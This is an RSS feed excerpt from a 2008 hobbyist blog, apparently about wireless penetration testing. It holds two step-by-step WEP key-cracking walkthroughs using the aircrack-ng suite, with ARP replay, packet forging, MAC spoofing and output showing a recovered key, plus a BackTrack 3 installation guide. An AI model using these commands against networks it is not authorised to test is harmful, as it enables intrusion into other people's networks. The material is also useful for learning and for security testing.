		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAD9eQ97ECis4d31D32gkb3tU2W4SXXTvYk2bMijdNe44S0TFTUOdperaOP-iPTWH_B9hCf6JaWDs4PYFf3jcPYxAJtU9VB9nf99dxPpITzspLp4Z7d6dOX7ZQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAB0IyL9y-XXWpR-uK6gseQdmrQRIqa0l4GNzewntvJAS3-acDEd4Hw3pM73I6W1wisYVBamUxKUQ4adDaXiVUr_AJtU9VA1PmN6e6sflRmLOTCbGJAE2gJSfQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAAmiolU5pk3Knhw8dig05L5gxZf-lgX0EmqaE6Q1tkkt6KSxNKHd8M5sPqBVxc2tRUO3ZBTEszyZtStgdrVHuZ_AJtU9VBHP1OQI0v--vMW0N_xTG61GGoIlg.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAC5WQwFQKWNJwsMj99VkqdlVAfjul0MWhm7Tv_vF7tmAPD0s_Xgho_M_k48kl6M9lWkHEAtDDIBJu0NYoKg6hthAJtU9VCqbijfPkFWjOi2oHxkJPGgtMnanw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums2/ATgAAADd7JfZH-VfbS8mEkWD-SsoE6dh9XML0D7Yc8ielAyAMlHlg3wUTXoH1mL7fiUIjxFCRgLUArDN4u8e8Mtt8uBYAJtU9VCy9eLQ7vaE9UvrhWJ2dZiWLuiPZw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATcAAADrWFpuvMRu0aGieK8zfW5q6RcAo87NlyxplgEozQNDx8OSZGUA7P_iTGf-QGE_TLE3S7_Zi-toSruRUouP15FMAJtU9VDU0JBAmgkif56Gl6DLwd0zWBE7-g.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATYAAABW7XhXVwXAkI7ePJo0Xt_QRkUqZeqSDO-3S5kWA2U6mevfQPZHE7HiCYVm5LZKKZ8HNNsT-ahBy_vGaVEnta3_AJtU9VCr7DUd_yXO5EqYblTQQCURriIWAQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATcAAACCn5BhH8I1LgOfuQNPlr_0K3D4rF09S-Ldgi1jW3sf2cs-ISBribfl9sobKqesNd_OQgCyHxOMUj2opteE3ZskAJtU9VABZ3Exy8ZtLgGeDPSJNERFNexKGQ.jpg" medium="image" />
	</item>
		<item>
		<title>Wireless WEP No Client ChopChop Attack</title>
		<link>http://wifi0wn.wordpress.com/2008/07/12/wireless-wep-no-client-chopchop-attack/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/12/wireless-wep-no-client-chopchop-attack/#comments</comments>
		<pubDate>Sat, 12 Jul 2008 19:42:48 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[chopchop attack]]></category>
		<category><![CDATA[clientless attack]]></category>
		<category><![CDATA[no client attack]]></category>
		<category><![CDATA[WEP]]></category>
		<category><![CDATA[WEP Crack]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=35</guid>
		<description><![CDATA[What is the no client is associated with AP and you are getting no more data packets.In such cases Deauth does not work.so here is how to do the attack airodump-ng wifi0 #copy bssid of the AP and press ctrl+c airodump-ng -c 11 -w thunderbolt &#8211;bssid 00:21:29:68:16:C2 rausb0 #-c channel on which AP is working [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=35&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;">What is the no client is associated with AP and you are getting no more data packets.In such cases Deauth does not work.so here is how to do the attack</p>
<p>airodump-ng wifi0<br />
#copy bssid of the AP and press ctrl+c<br />
airodump-ng -c 11 -w thunderbolt &#8211;bssid 00:21:29:68:16:C2 rausb0<br />
#-c channel on which AP is working<br />
#-w writing captured data<br />
#&#8211;bssid MAC of AP<br />
#wireless device-name like atho,wifi0,wlan0,rausb0,eth0</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATYAAADfFje9IJfZtNkmVN8BdqVtKcNgUTtf-d1wBLznaoo6HhjleqVCxkOWvL0o13-OHKch2JtVXBourhYCmA2hECHEAJtU9VBMiviWHjoMIOUjNLV8FlX8fFMJWQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">keep this window running and open new terminal</p>
<blockquote>
<p style="text-align:center;">
</blockquote>
<p style="text-align:left;">aireplay-ng -1 0 -e thunderbolt -a  00:21:29:68:16:C2 -h 00:21:29:65:38:42 rausb0</p>
<p style="text-align:left;">#-e essid is Extensible Service Set Identifier or AP Hostname</p>
<p style="text-align:left;">#-h MAC of Wireless Device</p>
<p style="text-align:left;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATYAAACOfmPMbfHZuuntZcjE0s7bbrUs23bC2T2bnePoIPaCNzrGy-3_TEWmfOckIOMSzbWdt2k6loKaTandsudVoSgnAJtU9VCI4jaX27WSyTg9d0-ITdHKTXqAlw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">Got Authenticated &amp; Association with AP</p>
<p style="text-align:left;">aireplay-ng -4 -h 00:21:29:65:38:42 -b 00:21:29:68:16:C2 rausb0</p>
<p style="text-align:left;">#-4 Arp Replay attack of Aireplay-ng</p>
<p style="text-align:left;">#-h MAC Address of wireless</p>
<p style="text-align:left;">#-b bssid or MAC of AP</p>
<p style="text-align:left;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums/ATYAAABgQWHBM77KknDoFUjDbVLE-WbPjP8z7-0AN47kudTcTBmujyo3cGQvaSPsLTkN9-OvRoy385Z5lLxqZeYFhD7qAJtU9VDAi_hnfcREtX4ujD7Zy-qWoOpHgg.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">Arp Replay attack in action see the AP.the data packets are increasing superfastly.wonderfull</p>
<p style="text-align:center;">Copy the XOR filename after this command fully executed</p>
<p style="text-align:left;">packetforge-ng -0 -a  00:21:29:68:16:C2 -h 00:21:29:65:38:42 -k 255.255.255.255 -l 255.255.255.255 -y replay123456.xor -w arp-request</p>
<p style="text-align:left;">#use packetforge-ng to make the XOR file usable to cracking into aircrack-ng</p>
<p style="text-align:left;">
<p style="text-align:left;">aireplay-ng -2 -h 00:21:29:65:38:42 -r arp-request  rausb0</p>
<p style="text-align:left;">#save the reply in capture file for later cracking in aircrack-ng</p>
<p style="text-align:left;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums/ATYAAAAneH5nSOQi94v3v2k49mJ3uRr60tqVZF8u72XE9pjCPfb8aVnnBFwokCOSZdPl9lunPD-7RDO0eHk1sMrCbFCuAJtU9VDG22Jw9K4NZHrTrH4Dd9WFzpjRrw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:left;">
<p>aircrack-ng -n 128 -z -f  1 -e thunderbolt -b 00:21:29:68:16:C2 thunderbolt*.cap</p>
<p>#-n number of WEP bits key applied.ex. 64,128,256 bit</p>
<p>#cap capture file which we mentioned in airodump command.</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATYAAAC9Hqh29ujOK9HRVtvoHOmZQhYpu2QiEbMwM9oiQ9zKVhyeMgtoqpbkHfHWps-Dc74kzLAkcl2E8LpbpDYwypFtAJtU9VDasEYAoN-VsNnT1CKczdz93pUP3A.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">We got the key decrypted 100% correctly</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:left;">
<p style="text-align:center;">
<blockquote>
<p style="text-align:left;">
</blockquote>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/35/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/35/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/35/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=35&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/12/wireless-wep-no-client-chopchop-attack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://images.orkut.com/orkut/albums3/ATYAAADfFje9IJfZtNkmVN8BdqVtKcNgUTtf-d1wBLznaoo6HhjleqVCxkOWvL0o13-OHKch2JtVXBourhYCmA2hECHEAJtU9VBMiviWHjoMIOUjNLV8FlX8fFMJWQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATYAAACOfmPMbfHZuuntZcjE0s7bbrUs23bC2T2bnePoIPaCNzrGy-3_TEWmfOckIOMSzbWdt2k6loKaTandsudVoSgnAJtU9VCI4jaX27WSyTg9d0-ITdHKTXqAlw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums/ATYAAABgQWHBM77KknDoFUjDbVLE-WbPjP8z7-0AN47kudTcTBmujyo3cGQvaSPsLTkN9-OvRoy385Z5lLxqZeYFhD7qAJtU9VDAi_hnfcREtX4ujD7Zy-qWoOpHgg.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums/ATYAAAAneH5nSOQi94v3v2k49mJ3uRr60tqVZF8u72XE9pjCPfb8aVnnBFwokCOSZdPl9lunPD-7RDO0eHk1sMrCbFCuAJtU9VDG22Jw9K4NZHrTrH4Dd9WFzpjRrw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATYAAAC9Hqh29ujOK9HRVtvoHOmZQhYpu2QiEbMwM9oiQ9zKVhyeMgtoqpbkHfHWps-Dc74kzLAkcl2E8LpbpDYwypFtAJtU9VDasEYAoN-VsNnT1CKczdz93pUP3A.jpg" medium="image" />
	</item>
		<item>
		<title>BT 3 DVD Installation On HDD &amp; Vmware with Dual Boot</title>
		<link>http://wifi0wn.wordpress.com/2008/07/06/bt-3-dvd-installation-on-hdd-vmware-with-dual-boot/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/06/bt-3-dvd-installation-on-hdd-vmware-with-dual-boot/#comments</comments>
		<pubDate>Sun, 06 Jul 2008 21:57:27 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[BT3]]></category>
		<category><![CDATA[installation]]></category>
		<category><![CDATA[LILO]]></category>
		<category><![CDATA[Live install]]></category>
		<category><![CDATA[Vmware]]></category>
		<category><![CDATA[Vmware Installation]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=26</guid>
		<description><![CDATA[after several days study and installation I made final documentation of comprehensive installation of BackTrack 3 DVD installation and Conflict free dual booting.I assume you have already made DVD ISO using make_iso.bat or using linux shell script file and burned the DVD ISO on DVD I am already having separate partition for linux which I [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=26&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>after several days study and installation I made final documentation of comprehensive installation of BackTrack 3 DVD installation and Conflict free dual booting.I assume you have already made DVD ISO using make_iso.bat or using linux shell script file and burned the DVD ISO on DVD I am already having separate partition for linux which I created previously having size 4.8GB.you can provide free space for partition using any windows utility like paragon partition manager.I proceed further-</p>
<p>BackTrack 3 DVD Installation On Hard-Disk</p>
<p>boot BackTrack 3 using ISO DVD</p>
<p>First after booting KDE 3.5<br />
click KDE menu<br />
System<br />
System Information<br />
Storage Device<br />
here you will get list of all mounted devices<br />
for a hazel free installation it is necessary that you unmount all the physical partitions because by default after booting using live DVD backtrack will mount all partitions.</p>
<p>Choose partition<br />
right click<br />
unmount<br />
(repeat steps for all physical mounted partitions)</p>
<p>For E.G my Hard-Disk Partition Table Is:</p>
<p><img class="alignleft" src="http://forums.remote-exploit.org/attachment.php?attachmentid=227&amp;d=1201087680" alt="" /></p>
<p>Now you got a rough idea which all partitions are to be unmounted(e.g.hdc1,hda7,hda5,hda6,hda1,hdc5)</p>
<p>hda-first hard-disk<br />
hdc-second hard-disk</p>
<p>I am assuming you are using hdc</p>
<p>open xterm<br />
bt~#fdisk /dev/hdc</p>
<p>p (view partition table)</p>
<p>n (create new partition at this point if you getting error no free sectors delete one of partition(warning:all data would be lost on that partition))</p>
<p>p (primary)</p>
<p>1 (partition 1)</p>
<p>def(enter)</p>
<p>+4200M (size for partition one.its root.storing files,downloaded data)</p>
<p>n (new partition)</p>
<p>p (primary)</p>
<p>2</p>
<p>def.(enter)</p>
<p>+64M (it would be our boot partition)</p>
<p>n (new partition)</p>
<p>p (primary)</p>
<p>3</p>
<p>def.(enter)</p>
<p>+522M (swap partition,double the amount of system RAM)</p>
<p>p (newly created partition table)</p>
<p>t (table for changing system partition id)</p>
<p>3 (that is our swap partition.def set to 83)</p>
<p>82 (making hdc3 partition as swap by changing its id from 83 to 82)</p>
<p>p (check partition table)</p>
<p>w (save changes)<br />
(at this point if you getting warning:error 16 Device or Resource busy.new partition table would come into effect after next restart then REBOOT.)</p>
<p>bt~#reboot (fdisk recommend this)</p>
<p>bt~#mke2fs /dev/hdc2<br />
bt~#mkswap /dev/hdc3<br />
bt~#swapon /dev/hdc3<br />
bt~#mkreiserfs /dev/hdc1<br />
choose (y/n)y<br />
bt~#mkdir /mnt/backtrack<br />
bt~#mount /dev/hdc1 /mnt/backtrack<br />
bt~#mkdir /mnt/backtrack/boot<br />
bt~#mount /dev/hdc2 /mnt/backtrack/boot<br />
bt~#cp &#8211;preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,sr v,var} /mnt/backtrack<br />
bt~#mkdir /mnt/backtrack{mnt,proc,sys,tmp}<br />
bt~#mount &#8211;bind /dev /mnt/backtrack/dev<br />
bt~#mount -t proc proc /mnt/backtrack/proc<br />
(at this point you can get error about directory not exist,may be its a bug that even after running aboce mkdir cmd the directory has not been created.go to backtrack directory and make directories by mkdir{mnt,proc,sys,tmp} here you are)<br />
bt~#cp /boot/vmlinuz /mnt/backtrack/boot<br />
bt~#chroot /mnt/backtrack /bin/bash<br />
bt~#nano /etc/lilo.conf</p>
<p>Configure LILO(find &amp; change following configs)<br />
boot = /dev/hda (for knowing which is your boot-disk use fdisk /dev/devicename(e.g./dev/hda or /dev/hdc the one which showing an start * is your boot partition)</p>
<p>timeout=1200 (timeout for LILO boot menu option)</p>
<p>#linux config &#8230;<br />
image = /boot/vmlinuz<br />
root = /dev/hdc1 (this is your root partition,the biggest one you created)<br />
label= BaCkTrAcK3(I33t)<br />
read-only<br />
#<br />
other = /dev/hda1<br />
label = WindowsOs(n00b) (here comes ms n00b O.S full with bugs lol)<br />
table = /dev/hda (disk where your Microsoft OS Resides)</p>
<p>save using ctrl + o &amp; press enter<br />
come out using ctrl + x<br />
bt~/#cd \<br />
bt~#lilo -v (remember its very important step to tell lilo which operating system is to be add in lilo boot loader list.if it goes well you have successfully installed the BackTrack 3 DVD version on your hard-disk along with Microsoft OS Dual Booting)<br />
bt~#init 6<br />
Installation of BT 3 on Vmware<br />
I got tutorial on BT3 installation on Vmware.Thanks to respective member.I am modifying it a little to make more comprehensive</p>
<p>tested using Vmware workstation 6.0.0 build-45371<br />
guest os-Linux<br />
version-Other linux 2.6 kernel<br />
networking-choose bridged or NAT<br />
Disk capacity-recommended 7-8GB<br />
now edit settings for this VM<br />
memory-128(if system RAM=256MB)<br />
192/256(if system RAM=512MB)<br />
cdrom-if using ISO DVD using Hard-disk.choose location else default DVD ISO.</p>
<p>boot BT3<br />
open xterm<br />
bt~#fdisk /dev/sda<br />
n<br />
p<br />
1<br />
def(enter)<br />
+6400M<br />
n<br />
p<br />
2<br />
def.(enter)<br />
def(enter)<br />
w</p>
<p>(at this point if you getting warning:error 16 Device or Resource busy.new partition table would come into effect after next restart then REBOOT.)<br />
bt~#init 6<br />
bt~#mkfs.ext3 /dev/sda1<br />
bt~#mkswap /dev/sda2<br />
bt~#mkdir /mnt/backtrack<br />
bt~#mount /dev/sda1 /mnt/backtrack<br />
bt~#exit</p>
<p>goto KDE menu-&gt;backtrack-&gt;Install Backtrack(Not tested)<br />
Source(Backtrack CD):<br />
Install backtrack to:/mnt/backtrack<br />
Write new MBR(lilo.mbr)to:/dev/sda<br />
Installation method:Real<br />
Uncheck-Restore orignal MBR after lilo (its very imp to UNCHECK this else your whole hard work will go in vain)<br />
Press Install<br />
hang out outside thinking how many tools your are going to work over on BT3 for about 30-40 mins.<br />
after installation<br />
Reboot using KDE menu-&gt;logoff-&gt;Reboot</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/26/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/26/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/26/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=26&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/06/bt-3-dvd-installation-on-hdd-vmware-with-dual-boot/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://forums.remote-exploit.org/attachment.php?attachmentid=227&#38;d=1201087680" medium="image" />
	</item>
		<item>
		<title>Intel 3945 Injection &amp; Fixes For Aircrack-ng BT3</title>
		<link>http://wifi0wn.wordpress.com/2008/07/06/intel-3945-injection-fixes-for-aircrack-ng-bt3/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/06/intel-3945-injection-fixes-for-aircrack-ng-bt3/#comments</comments>
		<pubDate>Sun, 06 Jul 2008 20:21:09 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[intel 3945]]></category>
		<category><![CDATA[intel3945 a/b/g]]></category>
		<category><![CDATA[IV]]></category>
		<category><![CDATA[WEP]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=20</guid>
		<description><![CDATA[remove old aircrack-ng 0.9 or whatever version you have bt ~ #make uninstall download bt ~ #svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng bt ~ #cd aircrack-ng bt aircrack-ng #gmake SQLITE=true bt aircrack-ng #gmake SQLITE=true install bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11g ESSID:&#8221;" Nickname:&#8221;" Mode:Managed [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=20&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>remove old aircrack-ng 0.9 or whatever version you have<br />
bt ~ #make uninstall</p>
<p>download<br />
bt ~ #svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng<br />
bt ~ #cd aircrack-ng<br />
bt aircrack-ng #gmake SQLITE=true<br />
bt aircrack-ng #gmake SQLITE=true install</p>
<p>bt ~ # iwconfig<br />
lo no wireless extensions.</p>
<p>eth0 no wireless extensions.</p>
<p>wmaster0 no wireless extensions.</p>
<p>wlan0 IEEE 802.11g ESSID:&#8221;" Nickname:&#8221;"<br />
Mode:Managed Channel:0 Access Point: Not-Associated<br />
Tx-Power=0 dBm<br />
Retry min limit:7 RTS thr:off Fragment thr=2346 B<br />
Encryption key:off<br />
Power Management:off<br />
Link Quality:0 Signal level:0 Noise level:0<br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</p>
<p>bt ~ #modprobe -r iwl3945<br />
bt ~ # iwconfig<br />
lo no wireless extensions.</p>
<p>eth0 no wireless extensions.</p>
<p>bt ~ #modprobe ipwraw</p>
<p>bt ~ # iwconfig<br />
lo no wireless extensions.</p>
<p>eth0 no wireless extensions.</p>
<p>wifi0 unassociated ESSID:off/any<br />
Mode:Monitor Channel=1 Bit Rate=54 Mb/s</p>
<p>rtap0 no wireless extensions.</p>
<p>here you are.you have enabled your intel3945 NIC to do discovery/injetion and penetration testing</p>
<p>bt ~ #ifconfig wifi0 down<br />
bt ~ # macchanger &#8211;mac 00:10:20:30:40:50 wifi0<br />
Current MAC: 00:ab:ab:ab:ab:ab (unknown)<br />
Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)<br />
mac spoofing for security. upto u :)<br />
bt ~ #ifconfig wifi0 up<br />
bt ~ # ifconfig wifi0<br />
wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00<br />
UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:2346 Metric:1<br />
RX packets:0 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:1000<br />
RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)<br />
Interrupt:19 Base address:0&#215;6000 Memory:f4300000-f4300fff<br />
bt ~ # airmon-ng start wifi0</p>
<p>Interface Chipset Driver</p>
<p>wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)</p>
<p>bt ~ #airodump-ng wifi0</p>
<p>get the SSID of your network AP<br />
and stop using ctrl+c because we dont want to unnecessariliy capture other ap&#8217;s data.</p>
<p>bt ~ # airodump-ng -c 11 -w pentest &#8211;bssid 00:08:5C:7B:9E:B5 wifi0<br />
(let the airodump window keep running to capture enough packets)</p>
<p>CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43</p>
<p>BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</p>
<p>00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara</p>
<p>BSSID STATION PWR Rate Lost Packets Probes</p>
<p>00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393</p>
<p>bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0<br />
13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11</p>
<p>13:35:08 Sending Authentication Request (Open System) [ACK]<br />
13:35:08 Authentication successful<br />
13:35:08 Sending Association Request [ACK]<br />
13:35:08 Association successful :-)</p>
<p>bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0<br />
13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11<br />
Saving ARP requests in replay_arp-0220-133556.cap<br />
You should also start airodump-ng to capture replies.<br />
Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets&#8230;(499 pps)</p>
<p>bt ~ # aircrack-ng -n 64 &#8211;bssid 00:08:5C:7B:9E:B5 pentest-01.cap<br />
Opening pentest-01.cap<br />
Attack will be restarted every 5000 captured ivs.<br />
Starting PTW attack with 54722 ivs.<br />
KEY FOUND! [ 98:45:00:88:57 ]<br />
Decrypted correctly: 100%</p>
<p>I hope this tutorial will help all the people having Intel3945 NIC for penetration testing and vulnerability test.thanks a lot to exploitz for making such wonderful tutorials and videos.if any mistake you found please let me know I will correct it.I am happy to be a proud member of this so full of knowledge forum with lots of tutorial.<br />
Tested On:<br />
My laptop Specification<br />
compaq presario v3000(v3607TU)<br />
Dual Core 1.6 GHz With 1 MB L2 Cache<br />
Intel 956GM Chipset<br />
120 GB HDD<br />
4 GB Transcend DDR2 667 MHz RAM<br />
Intel X3100 PCI-E<br />
Running OS.Backtrack 3 Beta Dual Boot With Windows Vista<br />
Vmware on Vista Running OS:Windows Server 2003 Enterprise Edition With IIS 6.0/ADS,Windows Xp Professional with SP3 latest updated,Sun Solaris 10,BackTrack 3</p>
<p>My Computer Specification<br />
Pentium 4 1.7 GHz PGA 478 socket<br />
Intel 850 MB orignal MB<br />
1 GB RDRAM PC800 Samsung<br />
200 GB HDD IDE Segate Baracuda 7200 RPM 160 GB + Segate Baracuda 5400 RPM 40 GB<br />
Asus Geforce 2 GTS 128 MB AGP 4x<br />
Running OS Windows XP Pro With SP3 ,Dual Boot With BT 3 Beta karnel 2.6.21.5</p>
<p>Here are proofs</p>
<p><img src="/DOCUME~1/THUNDE~1/LOCALS~1/Temp/moz-screenshot.jpg" alt="" /></p>
<p><img class="aligncenter" src="http://forums.remote-exploit.org/attachment.php?attachmentid=246&amp;stc=1&amp;d=1203513656" alt="" /></p>
<p><img class="aligncenter" src="http://forums.remote-exploit.org/attachment.php?attachmentid=247&amp;stc=1&amp;d=1203513802" alt="" /></p>
<p><img class="aligncenter" src="http://forums.remote-exploit.org/attachment.php?attachmentid=248&amp;d=1203513835" alt="" /></p>
<p><img class="aligncenter" src="http://forums.remote-exploit.org/attachment.php?attachmentid=249&amp;stc=1&amp;d=1203552637" alt="" /></p>
<p>Orignal post by me at Remote-exploit forums:</p>
<p><a href="http://forums.remote-exploit.org/showthread.php?t=12165" target="_blank">http://forums.remote-exploit.org/showthread.php?t=12165</a></p>
